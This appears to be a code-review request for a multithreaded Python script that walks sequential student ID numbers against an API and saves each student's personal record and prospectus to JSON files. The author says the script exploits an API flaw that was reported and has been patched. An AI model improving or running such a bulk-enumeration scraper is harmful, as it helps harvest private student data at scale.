I've been working on a Python script that fetches student data from an API using multiple threads for concurrency. The script retrieves both student information and prospectus data and saves them to JSON files.
I would appreciate feedback on the following aspects of the code:
- Exception Handling: The current exception handling is quite broad (except:). I'd like to know if there are better practices for handling exceptions, especially related to network errors.
- Code Duplication: I've noticed some duplication of code, especially when re-fetching data after encountering an invalid token. How can I refactor the code to make it more concise and maintainable?
- Thread Safety: Given the concurrent nature of the script, I am particularly interested in your insights regarding potential race conditions, especially concerning the management of the TokenChecker list utilized for inter-thread communication. Are there more robust strategies to ensure thread safety in this context?
Note: The API vulnerability exploit mentioned here has already sent to the dev team and has been patched up. I'm just here to get some feedback on the code itself. Thanks for understanding!
import requests
from get_token import get_token
import json
import threading
from datetime import datetime
def write_file(filename, data):
f = open(filename, 'w')
f.write(data)
f.close
def main():
token = get_token()
headers = {
"Authorization" : token
}
def fetch_data(idnum, TokenChecker):
print(f"Fetching Student: {idnum}")
while True:
try:
getStudentResponse = requests.get(f'https://apiname/get_info?studid={idnum}', headers=headers, timeout=(3.05, 5))
getProspectusResponse = requests.get(f'https://apiname/prospectus?studid={idnum}', headers=headers, timeout=(3.05, 5))
student_status_code = getStudentResponse.status_code
prospectus_status_code = getProspectusResponse.status_code
if((student_status_code == 200 and prospectus_status_code == 200) or (student_status_code == 500 or prospectus_status_code == 500 )):
break
except:
print(f"Fetched Timeout on ID: {idnum}")
write_file(f'prospectus/{idnum.split("-")[0]}/{idnum}.json', getProspectusResponse.text)
write_file(f'student_info/{idnum.split("-")[0]}/{idnum}.json', getStudentResponse.text)
TokenChecker.append({"responses" : [getStudentResponse, getProspectusResponse]})
return [getStudentResponse, getProspectusResponse]
for i in range(2019, 2025):
max_id = 10000
num_threads = 50
for j in range(0, max_id, num_threads):
TokenChecker = []
threads = []
for k in range(num_threads):
idnum = f"{str(i).zfill(4)}-{str(j + k).zfill(4)}"
t = threading.Thread(target=fetch_data, args=(idnum, TokenChecker,))
t.daemon = True
threads.append(t)
for k in range(num_threads):
threads[k].start()
for k in range(num_threads):
threads[k].join()
getStudentResponse, getProspectusResponse = TokenChecker[len(TokenChecker) - 1]['responses']
student_info = json.loads(getStudentResponse.text)
prospectus = json.loads(getProspectusResponse.text)
try:
if(student_info['message'] == 'Token is invalid' or prospectus['message' == 'Token is invalid']):
print(f'Change Token at: {datetime.now().strftime("%d/%m/%Y %H:%M:%S")}')
headers = {
"Authorization": get_token()
}
threads = []
for k in range(num_threads):
idnum = f"{str(i).zfill(4)}-{str(j + k).zfill(4)}"
t = threading.Thread(target=fetch_data, args=(idnum, TokenChecker,))
t.daemon = True
threads.append(t)
for k in range(num_threads):
threads[k].start()
for k in range(num_threads):
threads[k].join()
except:
pass
print("Fetching Done.")
if __name__ == "__main__":
main()